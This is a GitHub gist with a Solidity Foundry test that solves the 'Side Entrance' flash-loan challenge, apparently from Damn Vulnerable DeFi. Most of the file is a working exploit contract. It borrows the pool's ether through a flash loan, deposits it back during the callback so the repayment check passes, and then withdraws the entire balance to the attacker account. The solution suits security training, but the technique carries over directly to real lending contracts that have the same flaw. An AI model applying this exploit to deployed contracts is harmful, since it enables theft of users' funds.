Last active
April 6, 2024 23:42
-
-
Save BenFaruna/fa63490ee1cc76597f2dd5a128c27177 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity >=0.8.0; | |
import {Utilities} from "../../utils/Utilities.sol"; | |
import "forge-std/Test.sol"; | |
import {SideEntranceLenderPool} from "../src/SideEntranceLenderPool.sol"; | |
contract Exploit { | |
address sideAddr; | |
constructor(address _sideAddr) { | |
sideAddr = _sideAddr; | |
} | |
function attack(uint256 _amount) public payable { | |
SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr); | |
side.flashLoan(_amount); | |
} | |
function withdraw() public { | |
SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr); | |
side.withdraw(); | |
payable(msg.sender).call{value: address(this).balance}(""); | |
} | |
function execute() external payable { | |
SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr); | |
side.deposit{value: address(this).balance}(); | |
} | |
fallback() external payable {} | |
} | |
contract SideEntrance is Test { | |
uint256 internal constant ETHER_IN_POOL = 1_000e18; | |
Utilities internal utils; | |
SideEntranceLenderPool internal sideEntranceLenderPool; | |
address payable internal attacker; | |
uint256 public attackerInitialEthBalance; | |
function setUp() public { | |
utils = new Utilities(); | |
address payable[] memory users = utils.createUsers(1); | |
attacker = users[0]; | |
vm.label(attacker, "Attacker"); | |
sideEntranceLenderPool = new SideEntranceLenderPool(); | |
vm.label(address(sideEntranceLenderPool), "Side Entrance Lender Pool"); | |
vm.deal(address(sideEntranceLenderPool), ETHER_IN_POOL); | |
assertEq(address(sideEntranceLenderPool).balance, ETHER_IN_POOL); | |
attackerInitialEthBalance = address(attacker).balance; | |
console.log(unicode"🧨 Let's see if you can break it... 🧨"); | |
} | |
function testExploit() public { | |
/** | |
* EXPLOIT START * | |
*/ | |
Exploit exp = new Exploit(address(sideEntranceLenderPool)); | |
vm.startPrank(attacker); | |
exp.attack(ETHER_IN_POOL); | |
exp.withdraw(); | |
vm.stopPrank(); | |
/** | |
* EXPLOIT END * | |
*/ | |
validation(); | |
console.log(unicode"\n🎉 Congratulations"); | |
} | |
function validation() internal { | |
assertEq(address(sideEntranceLenderPool).balance, 0); | |
assertGt(attacker.balance, attackerInitialEthBalance); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment